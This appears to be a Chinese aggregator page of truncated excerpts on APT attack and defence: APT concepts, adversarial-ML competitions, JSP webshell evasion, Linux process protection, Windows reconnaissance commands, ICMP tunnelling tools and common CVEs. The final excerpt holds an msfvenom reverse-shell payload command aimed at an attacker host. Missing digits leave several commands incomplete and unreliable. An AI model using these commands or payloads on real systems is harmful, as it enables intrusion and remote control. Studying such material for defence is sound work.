APT攻防对抗

【APT攻防对抗】的更多相关文章

APT(高级持续性威胁)攻击是指近年来,专业甚至是有组织和国家背景支持的黑客,针对重要目标和系统发起的一种攻击手段,主要特征有 1)持续性:攻击者为了重要的目标长时间持续攻击直到攻破为止.攻击成功用上一年到三年,攻击成功后持续潜伏五年到十年的案例都有. 这种持续性攻击下,让攻击完全处于动态发展之中,而当前我们的防护体系都是强调静态对抗能力很少有防护者有动态对抗能力,因此防护者或许能挡住一时的攻击,但随时间的发展,系统不断有新的漏洞被发现,防御体系也会存在一定的空窗期:比如设备升级.应用需要的兼…

深度学习攻防对抗（JCAI-19 阿里巴巴人工智能对抗算法竞赛）

最近在参加IJCAI-19阿里巴巴人工智能对抗算法竞赛(点击了解),初赛刚刚结束,防御第23名,目标攻击和无目标攻击出了点小问题,成绩不太好都是50多名,由于找不到队友,只好一个人跟一群大佬PK,双拳难敌四手,差点自闭放弃比赛了.由于知道对抗攻击的人很少,于是抽空写篇博客,简单科普一下人工智能与信息安全的交叉前沿研究领域:深度学习攻防对抗. 然后简单介绍一下IJCAI-19 阿里巴巴人工智能对抗算法竞赛目前,人脸识别.自动驾驶.刷脸支付.抓捕逃犯.美颜直播……人工智能与实体经济深度结合,彻底改…

[Anti-AV] 从攻防对抗辩证性分析jsp免杀(一)

从攻防对抗辩证性分析jsp免杀从最早的最朴素木马 <%@ page import="java.io.InputStream" %> <%@ page import="java.io.BufferedReader" %> <%@ page import="java.io.InputStreamReader" %> <%@page language="java" pageEncoding…

Linux进程自保护攻防对抗技术研究（Process Kill Technology && Process Protection Against In Linux）

0. 引言 0x1: Linux系统攻防思想在linux下进行"进程kill"和"进程保护"的总体思路有以下几个,我们围绕这几个核心思想展开进行研究 . 直接从外部杀死目标进程 . 进入到目标进程内部,从内部杀死.毁坏目标进程 . 劫持目标进程的正常启动.执行流程,从而杀死进程 . 利用系统原生的机制来"命令"进程结束 . 从内核态进程进程杀死对于系统级攻防的对抗,我们需要明白,如果防御者和攻击者所处的层次维度是相同的(Ring3 again…

攻防对抗中常用的windows命令（渗透测试和应急响应）

一.渗透测试 1.信息收集类 #查看系统信息 >systeminfo #查看用户信息 >net user >net user xxx #查看网络信息 >ipconfig /all >route print >netstat -abon >netstat -s >nbtstat -c >nbtstat -n >arp -a #查询域信息 >net time /domain >net view /domain >net user /…

APT攻防整理-攻击方法/工具

攻击步骤一般步骤社工武器制造武器投递漏洞利用安装后门后渗透这5个阶段攻击非常隐蔽,可绕过传统安全设备检测潜伏控制传统通信方式不会使用,如cc/socket/http(可采用安全隧道拦截数据) -- 采用隐蔽隧道如ICMP/DNS 横向扩散清除日志 ICMP攻击原理 - 绕过WAF(多数防火墙未对ICMP流量做限制) 工具相关 PiX-C2.icmpsh.Nishang结合icmpsh .ptunnel .icmpshell 防御: DPI深度包解析技术机器学习神经网络…

APT攻防整理-常用CVE

常用CVE CVE-- 受影响版本 Windows /Windows /Windows Server /Windows Server R2/Windows Server /Windows Server R2/Windows Server 使用方式一 -kali下 .msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=KaliIP LPORT= -f psh-reflection>.ps1 .cp /root/.ps1 /var/www/ht…